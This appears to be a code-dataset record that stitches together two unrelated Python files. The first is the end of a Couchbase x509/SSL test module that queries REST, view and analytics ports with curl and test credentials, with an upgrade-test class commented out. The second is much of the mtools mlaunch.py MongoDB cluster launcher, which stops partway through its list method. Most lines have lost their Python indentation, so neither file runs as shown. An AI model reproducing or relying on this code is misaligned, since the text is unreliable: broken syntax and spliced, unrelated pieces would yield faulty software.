self.assertEqual(json.loads(output)['manager']['TotPlannerKickErr'], 0, "Issues with FTS Stats API")
# Check for analytics service api, right now SSL is not supported for Analytics, hence http port
def check_analytics_service(self, host):
rest = RestConnection(self.master)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
cmd = "curl -k -v " + \
" -s -u Administrator:password --data pretty=true --data-urlencode 'statement=create dataset on default' " + \
"{0}://{1}:{2}/_p/cbas/query/service ". \
format(self.protocol, host.ip, self.rest_port)
self.log.info("Running command : {0}".format(cmd))
output = subprocess.check_output(cmd, shell=True)
self.assertEqual(json.loads(output)['status'], "success", "Create CBAS Index Failed")
def check_views_ssl(self, host):
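        # exercise the view/capi SSL port (18092): a design-document PUT without a body and a
        # view query against a missing design doc, asserting the expected error responses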
rest = RestConnection(self.master)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/default/_design/dev_sample', port=18092, headers=' -XPUT ', client_cert=True, curl=True, verb='GET')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/default/_design/dev_sample', port=18092, headers=' -XPUT -u Administrator:password ', client_cert=False, curl=True, verb='GET')
if self.client_cert_state == 'enable':
self.assertEqual(json.loads(output)['reason'], "Content is not json.", "Create View Index Failed")
else:
self.assertEqual(json.loads(output)['error'], "invalid_design_document", "Create Index Failed")
# " https://{0}:{1}/default/_design/dev_sample -d '{\"views\":{\"sampleview\":{\"map\":\"function (doc, meta){emit(doc.emailId,meta.id, null);\n}\"}}, \"options\": {\"updateMinChanges\": 3, \"replicaUpdateMinChanges\": 3}}'". \
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/default/_design/dev_sample/_view/sampleview', port=18092, headers='', client_cert=True, curl=True, verb='POST')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/default/_design/dev_sample/_view/sampleview', port=18092, headers=' -u Administrator:password ', client_cert=False, curl=True, verb='POST')
self.assertEqual(json.loads(output)['error'], "not_found", "Create View Index Failed")
def test_rest_api_disable(self):
host = self.master
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=100)
status, output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=False)
        self.assertEqual(status, 401, "Issue with client cert: user should not be able to access via client cert")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=" -u Administrator:password ", client_cert=False, curl=True)
self.assertEqual(json.loads(output)['rebalanceStatus'], 'none', " The Web request has failed on port 18091 ")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=self.rest_port, headers=" -u Administrator:password ", client_cert=False, curl=True, verb='GET', plain_curl=True)
        self.assertEqual(json.loads(output)['rebalanceStatus'], 'none', " The Web request has failed on the plain REST port ")
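    # with client cert auth mandatory, client certs must work on 18091 while basic-auth-only requests are rejected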
def test_rest_api_mandatory(self):
host = self.master
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=100)
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=True)
self.assertEqual(json.loads(output)['name'], 'default', " The Web request has failed on port 18091 ")
cmd = "curl -v --cacert " + self.root_ca_path + \
" -u Administrator:password https://{0}:{1}/pools/default". \
format(self.master.ip, '18091')
self.log.info("Running command : {0}".format(cmd))
try:
output = subprocess.check_output(cmd, shell=True)
except:
self.assertTrue(True, "CA Cert works with mandatory")
if CbServer.use_https:
plain_curl = False
else:
plain_curl = True
status, output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=self.rest_port, headers=" -u Administrator:password ", client_cert=False, curl=False, verb='GET', plain_curl=plain_curl)
self.assertEqual(status, 401, "Invalid user gets authenticated successfully")
def test_incorrect_user(self):
host = self.master
rest = RestConnection(self.master)
rest.create_bucket(bucket='default', ramQuotaMB=100)
status = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=False)
self.assertEqual(status[0], 'error' , "Invalid user gets authenticated successfully")
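    # uploading a client cert auth JSON config with an invalid 'path' value should return a descriptive error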
def test_upload_json_tests(self):
rest = RestConnection(self.master)
x509main(self.master).write_client_cert_json_new(self.client_cert_state, self.paths, self.prefixs, self.delimeters)
status, content = x509main(self.master)._upload_cluster_ca_settings("Administrator", "password")
if "Invalid value 'subject.test' for key 'path'" in content:
self.assertTrue(True, " Correct error message for key path")
'''
class x509_upgrade(NewUpgradeBaseTest):
def setUp(self):
super(x509_upgrade, self).setUp()
self.initial_version = self.input.param("initial_version", '4.5.0-900')
self.upgrade_version = self.input.param("upgrade_version", "4.5.0-1069")
self.ip_address = '172.16.1.174'
self.root_ca_path = x509main.CACERTFILEPATH + x509main.CACERTFILE
self.client_cert_pem = x509main.CACERTFILEPATH + self.ip_address + ".pem"
self.client_cert_key = x509main.CACERTFILEPATH + self.ip_address + ".key"
# Input parameters for state, path, delimeters and prefixes
self.client_cert_state = self.input.param("client_cert_state", "disable")
self.paths = self.input.param('paths', "subject.cn:san.dnsname:san.uri").split(":")
self.prefixs = self.input.param('prefixs', 'www.cb-:us.:www.').split(":")
        self.delimeters = self.input.param('delimeter', '.:.:.').split(":")
self.setup_once = self.input.param("setup_once", False)
SSLtype = self.input.param("SSLtype", "openssl")
encryption_type = self.input.param('encryption_type', "")
key_length = self.input.param("key_length", 1024)
self.dns = self.input.param('dns', None)
self.uri = self.input.param('uri', None)
copy_servers = copy.deepcopy(self.servers)
self._reset_original()
if (self.dns is not None) or (self.uri is not None):
x509main(self.master)._generate_cert(copy_servers, type=SSLtype, encryption=encryption_type, key_length=key_length, client_ip=self.ip_address, alt_names='non_default', dns=self.dns, uri=self.uri)
else:
x509main(self.master)._generate_cert(copy_servers, type=SSLtype, encryption=encryption_type, key_length=key_length, client_ip=self.ip_address)
self.log.info(" Path is {0} - Prefixs - {1} -- Delimeters - {2}".format(self.paths, self.prefixs, self.delimeters))
if (self.setup_once):
x509main(self.master).setup_master(self.client_cert_state, self.paths, self.prefixs, self.delimeters)
x509main().setup_cluster_nodes_ssl(self.servers)
enable_audit = self.input.param('audit', None)
if enable_audit:
Audit = audit(host=self.master)
currentState = Audit.getAuditStatus()
self.log.info ("Current status of audit on ip - {0} is {1}".format(self.master.ip, currentState))
if not currentState:
self.log.info ("Enabling Audit ")
Audit.setAuditEnable('true')
self.sleep(30)
def tearDown(self):
self._reset_original()
super(x509_upgrade, self).tearDown()
def _reset_original(self):
self.log.info ("Reverting to original state - regenerating certificate and removing inbox folder")
for servers in self.servers:
rest = RestConnection(servers)
rest.regenerate_cluster_certificate()
x509main(servers)._delete_inbox_folder()
def check_rest_api(self, host):
rest = RestConnection(host)
helper = RestHelper(rest)
if not helper.bucket_exists('default'):
rest.create_bucket(bucket='default', ramQuotaMB=100)
self.sleep(10)
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers="", client_cert=True, curl=True)
else:
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=' -u Administrator:password ', client_cert=False, curl=True)
output = json.loads(output)
self.log.info ("Print output of command is {0}".format(output))
self.assertEqual(output['rebalanceStatus'], 'none', " The Web request has failed on port 18091 ")
if self.client_cert_state == 'enable':
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=None, client_cert=True, curl=True, verb='POST', data='memoryQuota=400')
else:
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=18091, headers=' -u Administrator:password ', client_cert=False, curl=True, verb='POST', data='memoryQuota=400')
if output == "":
self.assertTrue(True, "Issue with post on /pools/default")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=8091, headers=" -u Administrator:password ", client_cert=False, curl=True, verb='GET', plain_curl=True)
self.assertEqual(json.loads(output)['rebalanceStatus'], 'none', " The Web request has failed on port 8091 ")
output = x509main()._execute_command_clientcert(host.ip, url='/pools/default', port=8091, headers=" -u Administrator:password ", client_cert=True, curl=True, verb='POST', plain_curl=True, data='memoryQuota=400')
if output == "":
self.assertTrue(True, "Issue with post on /pools/default")
def _sdk_connection(self, root_ca_path=x509main.CACERTFILEPATH + x509main.CACERTFILE, bucket='default', host_ip=None, sdk_version='pre-vulcan'):
self.sleep(30)
result = False
self.add_built_in_server_user([{'id': bucket, 'name': bucket, 'password': 'password'}], \
[{'id': bucket, 'name': bucket, 'roles': 'admin'}], self.master)
if sdk_version == 'pre-vulcan':
connection_string = 'couchbases://' + host_ip + '/' + bucket + '?certpath=' + root_ca_path
self.log.info("Connection string is -{0}".format(connection_string))
try:
cb = Bucket(connection_string, password='password')
if cb is not None:
result = True
return result, cb
except Exception as ex:
self.log.info("Expection is -{0}".format(ex))
elif sdk_version == 'vulcan':
self.add_built_in_server_user([{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}], \
[{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}], self.master)
key_file = x509main.CACERTFILEPATH + self.ip_address + ".key"
chain_file = x509main.CACERTFILEPATH + "/long_chain" + self.ip_address + ".pem"
connection_string = 'couchbases://' + host_ip + '/?certpath=' + chain_file + "&keypath=" + key_file
self.log.info("Connection string is -{0}".format(connection_string))
try:
                cluster = Cluster(connection_string)
cb = cluster.open_bucket(bucket)
if cb is not None:
result = True
return result, cb
except Exception as ex:
self.log.info("Expection is -{0}".format(ex))
return result
def upgrade_all_nodes(self):
servers_in = self.servers[1:]
self._install(self.servers)
rest_conn = RestConnection(self.master)
rest_conn.init_cluster(username='Administrator', password='password')
rest_conn.create_bucket(bucket='default', ramQuotaMB=512)
self.cluster.rebalance(self.servers, servers_in, [])
upgrade_threads = self._async_update(upgrade_version=self.upgrade_version, servers=self.servers)
for threads in upgrade_threads:
threads.join()
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Cannot create a security connection with server")
self.check_rest_api(server)
def upgrade_half_nodes(self):
serv_upgrade = self.servers[2:4]
servers_in = self.servers[1:]
self._install(self.servers)
rest_conn = RestConnection(self.master)
rest_conn.init_cluster(username='Administrator', password='password')
rest_conn.create_bucket(bucket='default', ramQuotaMB=512)
self.cluster.rebalance(self.servers, servers_in, [])
upgrade_threads = self._async_update(upgrade_version=self.upgrade_version, servers=serv_upgrade)
for threads in upgrade_threads:
threads.join()
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertFalse(result, "Can create a security connection with server")
def upgrade_all_nodes_4_6_3(self):
servers_in = self.servers[1:]
self._install(self.servers)
rest_conn = RestConnection(self.master)
rest_conn.init_cluster(username='Administrator', password='password')
rest_conn.create_bucket(bucket='default', ramQuotaMB=512)
self.cluster.rebalance(self.servers, servers_in, [])
x509main(self.master).setup_master()
x509main().setup_cluster_nodes_ssl(self.servers, reload_cert=True)
upgrade_threads = self._async_update(upgrade_version=self.upgrade_version, servers=self.servers)
for threads in upgrade_threads:
threads.join()
for server in self.servers:
result = self._sdk_connection(host_ip=server.ip)
self.assertTrue(result, "Cannot create a security connection with server")
result = self._sdk_connection(host_ip=server.ip, sdk_version='vulcan')
self.assertTrue(result, "Cannot create a security connection with server")
self.check_rest_api(server)
'''
|
mlaunch.py
|
#!/usr/bin/env python
import Queue
import argparse
import subprocess
import threading
import os, time, sys, re
import socket
import json
import warnings
import psutil
import signal
from collections import defaultdict
from mtools.util import OrderedDict
from operator import itemgetter, eq
from mtools.util.cmdlinetool import BaseCmdLineTool
from mtools.util.print_table import print_table
from mtools.version import __version__
try:
try:
from pymongo import MongoClient as Connection
from pymongo import MongoReplicaSetClient as ReplicaSetConnection
from pymongo import version_tuple as pymongo_version
from bson import SON
from StringIO import StringIO
from distutils.version import LooseVersion
except ImportError:
from pymongo import Connection
from pymongo import ReplicaSetConnection
from pymongo import version_tuple as pymongo_version
from bson import SON
from pymongo.errors import ConnectionFailure, AutoReconnect, OperationFailure, ConfigurationError
except ImportError:
raise ImportError("Can't import pymongo. See http://api.mongodb.org/python/current/ for instructions on how to install pymongo.")
# wrapper around Connection (itself conditionally a MongoClient or
# pymongo.Connection) to specify timeout if pymongo >= 3.0
class MongoConnection(Connection):
def __init__(self, *args, **kwargs):
if pymongo_version[0] >= 3:
            if 'serverSelectionTimeoutMS' not in kwargs:
                kwargs['serverSelectionTimeoutMS'] = 1
        else:
            if 'serverSelectionTimeoutMS' in kwargs:
                # dicts have no remove(); drop the option for pymongo < 3
                del kwargs['serverSelectionTimeoutMS']
Connection.__init__(self, *args, **kwargs)
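# Example (sketch): used like a plain MongoClient/Connection, e.g.
#   con = MongoConnection('localhost:27017')
#   con.admin.command('ping')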
def wait_for_host(port, interval=1, timeout=30, to_start=True, queue=None):
""" Ping a mongos or mongod every `interval` seconds until it responds, or `timeout` seconds have passed. If `to_start`
is set to False, will wait for the node to shut down instead. This function can be called as a separate thread.
If queue is provided, it will place the results in the message queue and return, otherwise it will just return the result
directly.
"""
host = 'localhost:%i'%port
startTime = time.time()
while True:
if (time.time() - startTime) > timeout:
if queue:
queue.put_nowait((port, False))
return False
try:
# make connection and ping host
con = MongoConnection(host)
con.admin.command('ping')
if to_start:
if queue:
queue.put_nowait((port, True))
return True
else:
time.sleep(interval)
except Exception as e:
if to_start:
time.sleep(interval)
else:
if queue:
queue.put_nowait((port, True))
return True
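# Example (sketch): wait for a mongod on port 27017 from a separate thread, collecting the
# (port, success) result through a queue:
#   q = Queue.Queue()
#   threading.Thread(target=wait_for_host, kwargs={'port': 27017, 'queue': q}).start()
#   port, ok = q.get()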
def shutdown_host(port, username=None, password=None, authdb=None):
""" send the shutdown command to a mongod or mongos on given port. This function can be called as a separate thread. """
host = 'localhost:%i'%port
try:
mc = MongoConnection(host)
try:
if username and password and authdb:
if authdb != "admin":
raise RuntimeError("given username/password is not for admin database")
else:
try:
mc.admin.authenticate(name=username, password=password)
except OperationFailure:
# perhaps auth is not required
pass
mc.admin.command('shutdown', force=True)
except AutoReconnect:
pass
except OperationFailure:
print "Error: cannot authenticate to shut down %s." % host
return
except ConnectionFailure:
pass
else:
mc.close()
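# Example (sketch): gracefully shut down an unauthenticated mongod listening on port 27018:
#   shutdown_host(27018)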
class MLaunchTool(BaseCmdLineTool):
def __init__(self):
BaseCmdLineTool.__init__(self)
# arguments
self.args = None
# startup parameters for each port
self.startup_info = {}
# data structures for the discovery feature
self.cluster_tree = {}
self.cluster_tags = defaultdict(list)
self.cluster_running = {}
# config docs for replica sets (key is replica set name)
self.config_docs = {}
# shard connection strings
self.shard_connection_str = []
def run(self, arguments=None):
""" This is the main run method, called for all sub-commands and parameters.
It sets up argument parsing, then calls the sub-command method with the same name.
"""
# set up argument parsing in run, so that subsequent calls to run can call different sub-commands
self.argparser = argparse.ArgumentParser()
self.argparser.add_argument('--version', action='version', version="mtools version %s" % __version__)
self.argparser.add_argument('--no-progressbar', action='store_true', default=False, help='disables progress bar')
self.argparser.description = 'script to launch MongoDB stand-alone servers, replica sets and shards.'
# make sure init is default command even when specifying arguments directly
if arguments and arguments.startswith('-'):
arguments = 'init ' + arguments
# default sub-command is `init` if none provided
elif len(sys.argv) > 1 and sys.argv[1].startswith('-') and sys.argv[1] not in ['-h', '--help', '--version']:
sys.argv = sys.argv[0:1] + ['init'] + sys.argv[1:]
# create command sub-parsers
subparsers = self.argparser.add_subparsers(dest='command')
self.argparser._action_groups[0].title = 'commands'
self.argparser._action_groups[0].description = 'init is the default command and can be omitted. To get help on individual commands, run mlaunch <command> --help'
# init command
init_parser = subparsers.add_parser('init', help='initialize a new MongoDB environment and start stand-alone instances, replica sets, or sharded clusters.',
description='initialize a new MongoDB environment and start stand-alone instances, replica sets, or sharded clusters')
# either single or replica set
me_group = init_parser.add_mutually_exclusive_group(required=True)
me_group.add_argument('--single', action='store_true', help='creates a single stand-alone mongod instance')
me_group.add_argument('--replicaset', action='store_true', help='creates replica set with several mongod instances')
# replica set arguments
init_parser.add_argument('--nodes', action='store', metavar='NUM', type=int, default=3, help='adds NUM data nodes to replica set (requires --replicaset, default=3)')
init_parser.add_argument('--arbiter', action='store_true', default=False, help='adds arbiter to replica set (requires --replicaset)')
init_parser.add_argument('--name', action='store', metavar='NAME', default='replset', help='name for replica set (default=replset)')
init_parser.add_argument('--priority', action='store_true', default=False, help='make lowest-port member primary')
# sharded clusters
init_parser.add_argument('--sharded', '--shards', action='store', nargs='+', metavar='N', help='creates a sharded setup consisting of several singles or replica sets. Provide either list of shard names or number of shards.')
init_parser.add_argument('--config', action='store', default=-1, type=int, metavar='NUM', help='adds NUM config servers to sharded setup (requires --sharded, default=1, with --csrs default=3)')
init_parser.add_argument('--csrs', default=False, action='store_true', help='deploy config servers as a replica set (requires MongoDB >= 3.2.0)')
init_parser.add_argument('--mongos', action='store', default=1, type=int, metavar='NUM', help='starts NUM mongos processes (requires --sharded, default=1)')
# verbose, port, binary path
init_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
init_parser.add_argument('--port', action='store', type=int, default=27017, help='port for mongod, start of port range in case of replica set or shards (default=27017)')
init_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
init_parser.add_argument('--dir', action='store', default='./data', help='base directory to create db and log paths (default=./data/)')
init_parser.add_argument('--hostname', action='store', default=socket.gethostname(), help='override hostname for replica set configuration')
# authentication, users, roles
self._default_auth_roles = ['dbAdminAnyDatabase', 'readWriteAnyDatabase', 'userAdminAnyDatabase', 'clusterAdmin']
init_parser.add_argument('--auth', action='store_true', default=False, help='enable authentication and create a key file and admin user (default=user/password)')
init_parser.add_argument('--username', action='store', type=str, default='user', help='username to add (requires --auth, default=user)')
init_parser.add_argument('--password', action='store', type=str, default='password', help='password for given username (requires --auth, default=password)')
init_parser.add_argument('--auth-db', action='store', type=str, default='admin', metavar='DB', help='database where user will be added (requires --auth, default=admin)')
        init_parser.add_argument('--auth-roles', action='store', default=self._default_auth_roles, metavar='ROLE', nargs='*', help='admin user\'s privilege roles; note that the clusterAdmin role is required to run the stop command (requires --auth, default="%s")' % ' '.join(self._default_auth_roles))
# start command
start_parser = subparsers.add_parser('start', help='starts existing MongoDB instances. Example: "mlaunch start config" will start all config servers.',
description='starts existing MongoDB instances. Example: "mlaunch start config" will start all config servers.')
start_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all non-running nodes will be restarted. Provide additional tags to narrow down the set of nodes to start.')
start_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
start_parser.add_argument('--dir', action='store', default='./data', help='base directory to start nodes (default=./data/)')
start_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
# stop command
stop_parser = subparsers.add_parser('stop', help='stops running MongoDB instances. Example: "mlaunch stop shard 2 secondary" will stop all secondary nodes of shard 2.',
description='stops running MongoDB instances with the shutdown command. Example: "mlaunch stop shard 2 secondary" will stop all secondary nodes of shard 2.')
stop_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all running nodes will be stopped. Provide additional tags to narrow down the set of nodes to stop.')
stop_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
stop_parser.add_argument('--dir', action='store', default='./data', help='base directory to stop nodes (default=./data/)')
# restart command
restart_parser = subparsers.add_parser('restart', help='stops, then restarts MongoDB instances.',
description='stops running MongoDB instances with the shutdown command. Then restarts the stopped instances.')
restart_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all non-running nodes will be restarted. Provide additional tags to narrow down the set of nodes to start.')
restart_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
restart_parser.add_argument('--dir', action='store', default='./data', help='base directory to restart nodes (default=./data/)')
restart_parser.add_argument('--binarypath', action='store', default=None, metavar='PATH', help='search for mongod/s binaries in the specified PATH.')
# list command
list_parser = subparsers.add_parser('list', help='list MongoDB instances of this environment.',
description='list MongoDB instances of this environment.')
list_parser.add_argument('--dir', action='store', default='./data', help='base directory to list nodes (default=./data/)')
list_parser.add_argument('--tags', action='store_true', default=False, help='outputs the tags for each instance. Tags can be used to target instances for start/stop/kill.')
list_parser.add_argument('--startup', action='store_true', default=False, help='outputs the startup command lines for each instance.')
list_parser.add_argument('--verbose', action='store_true', default=False, help='alias for --tags.')
# list command
kill_parser = subparsers.add_parser('kill', help='kills (or sends another signal to) MongoDB instances of this environment.',
description='kills (or sends another signal to) MongoDB instances of this environment.')
kill_parser.add_argument('tags', metavar='TAG', action='store', nargs='*', default=[], help='without tags, all running nodes will be killed. Provide additional tags to narrow down the set of nodes to kill.')
kill_parser.add_argument('--dir', action='store', default='./data', help='base directory to kill nodes (default=./data/)')
kill_parser.add_argument('--signal', action='store', default=15, help='signal to send to processes, default=15 (SIGTERM)')
kill_parser.add_argument('--verbose', action='store_true', default=False, help='outputs more verbose information.')
# argparser is set up, now call base class run()
BaseCmdLineTool.run(self, arguments, get_unknowns=True)
# conditions on argument combinations
if self.args['command'] == 'init' and 'single' in self.args and self.args['single']:
if self.args['arbiter']:
self.argparser.error("can't specify --arbiter for single nodes.")
# replace path with absolute path, but store relative path as well
self.relative_dir = self.args['dir']
self.dir = os.path.abspath(self.args['dir'])
self.args['dir'] = self.dir
# branch out in sub-commands
getattr(self, self.args['command'])()
# -- below are the main commands: init, start, stop, list, kill
def init(self):
""" sub-command init. Branches out to sharded, replicaset or single node methods. """
# check for existing environment. Only allow subsequent 'mlaunch init' if they are identical.
if self._load_parameters():
if self.loaded_args != self.args:
raise SystemExit('A different environment already exists at %s.' % self.dir)
first_init = False
else:
first_init = True
# number of default config servers
if self.args['config'] == -1:
self.args['config'] = 1
# Check if config replicaset is applicable to this version
current_version = self.getMongoDVersion()
# Exit with error if --csrs is set and MongoDB < 3.1.0
if self.args['csrs'] and LooseVersion(current_version) < LooseVersion("3.1.0"):
errmsg = " \n * The '--csrs' option requires MongoDB version 3.2.0 or greater, the current version is %s.\n" % current_version
raise SystemExit(errmsg)
# add the 'csrs' parameter as default for MongoDB >= 3.3.0
if LooseVersion(current_version) >= LooseVersion("3.3.0"):
self.args['csrs'] = True
# check if authentication is enabled, make key file
if self.args['auth'] and first_init:
if not os.path.exists(self.dir):
os.makedirs(self.dir)
os.system('openssl rand -base64 753 > %s/keyfile'%self.dir)
os.system('chmod 600 %s/keyfile'%self.dir)
# construct startup strings
self._construct_cmdlines()
# if not all ports are free, complain and suggest alternatives.
all_ports = self.get_tagged(['all'])
ports_avail = self.wait_for(all_ports, 1, 1, to_start=False)
if not all(map(itemgetter(1), ports_avail)):
dir_addon = ' --dir %s'%self.relative_dir if self.relative_dir != './data' else ''
errmsg = '\nThe following ports are not available: %s\n\n' % ', '.join( [ str(p[0]) for p in ports_avail if not p[1] ] )
errmsg += " * If you want to restart nodes from this environment, use 'mlaunch start%s' instead.\n" % dir_addon
errmsg += " * If the ports are used by a different mlaunch environment, stop those first with 'mlaunch stop --dir <env>'.\n"
errmsg += " * You can also specify a different port range with an additional '--port <startport>'\n"
raise SystemExit(errmsg)
if self.args['sharded']:
shard_names = self._get_shard_names(self.args)
# start mongod (shard and config) nodes and wait
nodes = self.get_tagged(['mongod', 'down'])
self._start_on_ports(nodes, wait=True, overrideAuth=True)
# initiate replica sets if init is called for the first time
if first_init:
if self.args['csrs']:
# Initiate config servers in a replicaset
if self.args['verbose']:
print 'Initiating config server replica set.'
members = sorted(self.get_tagged(["config"]))
self._initiate_replset(members[0], "configRepl")
for shard in shard_names:
# initiate replica set on first member
if self.args['verbose']:
print 'Initiating shard replica set %s.' % shard
members = sorted(self.get_tagged([shard]))
self._initiate_replset(members[0], shard)
# add mongos
mongos = sorted(self.get_tagged(['mongos', 'down']))
self._start_on_ports(mongos, wait=True, overrideAuth=True)
if first_init:
# add shards
mongos = sorted(self.get_tagged(['mongos']))
con = MongoConnection('localhost:%i'%mongos[0])
shards_to_add = len(self.shard_connection_str)
nshards = con['config']['shards'].count()
if nshards < shards_to_add:
if self.args['replicaset']:
print "adding shards. can take up to 30 seconds..."
else:
print "adding shards."
shard_conns_and_names = zip(self.shard_connection_str, shard_names)
while True:
try:
nshards = con['config']['shards'].count()
except:
nshards = 0
if nshards >= shards_to_add:
break
for conn_str, name in shard_conns_and_names:
try:
res = con['admin'].command( SON([('addShard', conn_str), ('name', name)]) )
except Exception as e:
if self.args['verbose']:
print e, ', will retry in a moment.'
continue
if res['ok']:
if self.args['verbose']:
print "shard %s added successfully"%conn_str
shard_conns_and_names.remove( (conn_str, name) )
break
else:
if self.args['verbose']:
print res, '- will retry'
time.sleep(1)
elif self.args['single']:
# just start node
nodes = self.get_tagged(['single', 'down'])
self._start_on_ports(nodes, wait=False)
elif self.args['replicaset']:
# start nodes and wait
nodes = sorted(self.get_tagged(['mongod', 'down']))
self._start_on_ports(nodes, wait=True)
# initiate replica set
if first_init:
self._initiate_replset(nodes[0], self.args['name'])
# wait for all nodes to be running
nodes = self.get_tagged(['all'])
self.wait_for(nodes)
# now that nodes are running, add admin user if authentication enabled
if self.args['auth'] and first_init:
self.discover()
nodes = []
if self.args['sharded']:
nodes = self.get_tagged(['mongos', 'running'])
elif self.args['single']:
nodes = self.get_tagged(['single', 'running'])
elif self.args['replicaset']:
print "waiting for primary to add a user."
if self._wait_for_primary():
nodes = self.get_tagged(['primary', 'running'])
else:
raise RuntimeError("failed to find a primary, so adding admin user isn't possible")
if not nodes:
raise RuntimeError("can't connect to server, so adding admin user isn't possible")
if "clusterAdmin" not in self.args['auth_roles']:
warnings.warn("the stop command will not work with auth because the user does not have the clusterAdmin role")
self._add_user(sorted(nodes)[0], name=self.args['username'], password=self.args['password'],
database=self.args['auth_db'], roles=self.args['auth_roles'])
if self.args['verbose']:
print "added user %s on %s database" % (self.args['username'], self.args['auth_db'])
# in sharded env, if --mongos 0, kill the dummy mongos
if self.args['sharded'] and self.args['mongos'] == 0:
port = self.args['port']
print "shutting down temporary mongos on localhost:%s" % port
username = self.args['username'] if self.args['auth'] else None
password = self.args['password'] if self.args['auth'] else None
authdb = self.args['auth_db'] if self.args['auth'] else None
shutdown_host(port, username, password, authdb)
# write out parameters
if self.args['verbose']:
print "writing .mlaunch_startup file."
self._store_parameters()
# discover again, to get up-to-date info
self.discover()
# for sharded authenticated clusters, restart after first_init to enable auth
if self.args['sharded'] and self.args['auth'] and first_init:
if self.args['verbose']:
print "restarting cluster to enable auth..."
self.restart()
if self.args['auth']:
print 'Username "%s", password "%s"' % (
self.args['username'], self.args['password'])
if self.args['verbose']:
print "done."
# Get the "mongod" version, useful for checking for support or non-support of features
# Normally we expect to get back something like "db version v3.4.0", but with release candidates
# we get abck something like "db version v3.4.0-rc2". This code exact the "major.minor.revision"
# part of the string
def getMongoDVersion(self):
binary = "mongod"
if self.args and self.args['binarypath']:
binary = os.path.join(self.args['binarypath'], binary)
ret = subprocess.Popen(['%s --version' % binary], stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
out, err = ret.communicate()
buf = StringIO(out)
current_version = buf.readline().rstrip('\n')
# remove prefix "db version v"
if current_version.rindex('v') > 0:
current_version = current_version.rpartition('v')[2]
# remove suffix making assumption that all release candidates equal revision 0
try:
if current_version.rindex('-') > 0: # release candidate?
current_version = current_version.rpartition('-')[0]
except Exception:
pass
if self.args['verbose']:
print "Detected mongod version: %s" % current_version
return current_version
def stop(self):
""" sub-command stop. This method will parse the list of tags and stop the matching nodes.
Each tag has a set of nodes associated with it, and only the nodes matching all tags (intersection)
will be shut down.
Currently this is an alias for kill()
"""
self.kill()
def start(self):
""" sub-command start. """
self.discover()
# startup_info only gets loaded from protocol version 2 on, check if it's loaded
if not self.startup_info:
# hack to make environment startable with older protocol versions < 2: try to start nodes via init if all nodes are down
if len(self.get_tagged(['down'])) == len(self.get_tagged(['all'])):
self.args = self.loaded_args
print "upgrading mlaunch environment meta-data."
return self.init()
else:
raise SystemExit("These nodes were created with an older version of mlaunch (v1.1.1 or below). To upgrade this environment and make use of the start/stop/list commands, stop all nodes manually, then run 'mlaunch start' again. You only have to do this once.")
# if new unknown_args are present, compare them with loaded ones (here we can be certain of protocol v2+)
if self.args['binarypath'] != None or (self.unknown_args and set(self.unknown_args) != set(self.loaded_unknown_args)):
# store current args, use self.args from the file (self.loaded_args)
start_args = self.args
self.args = self.loaded_args
self.args['binarypath'] = start_args['binarypath']
# construct new startup strings with updated unknown args. They are for this start only and
# will not be persisted in the .mlaunch_startup file
self._construct_cmdlines()
# reset to original args for this start command
self.args = start_args
matches = self._get_ports_from_args(self.args, 'down')
if len(matches) == 0:
raise SystemExit('no nodes started.')
# start config servers first
config_matches = self.get_tagged(['config']).intersection(matches)
self._start_on_ports(config_matches, wait=True)
# start shards next
mongod_matches = self.get_tagged(['mongod']) - self.get_tagged(['config'])
mongod_matches = mongod_matches.intersection(matches)
self._start_on_ports(mongod_matches, wait=True)
# now start mongos
mongos_matches = self.get_tagged(['mongos']).intersection(matches)
self._start_on_ports(mongos_matches)
# wait for all matched nodes to be running
self.wait_for(matches)
# refresh discover
self.discover()
def list(self):
""" sub-command list. Takes no further parameters. Will discover the current configuration and
print a table of all the nodes with status and port.
"""
self.discover()
print_docs = []
# mongos
for node in sorted(self.get_tagged(['mongos'])):
doc = OrderedDict([ ('process','mongos'), ('port',node), ('status','running' if self.cluster_running[node] else 'down') ])
print_docs.append( doc )
if len(self.get_tagged(['mongos'])) > 0:
print_docs.append( None )
# configs
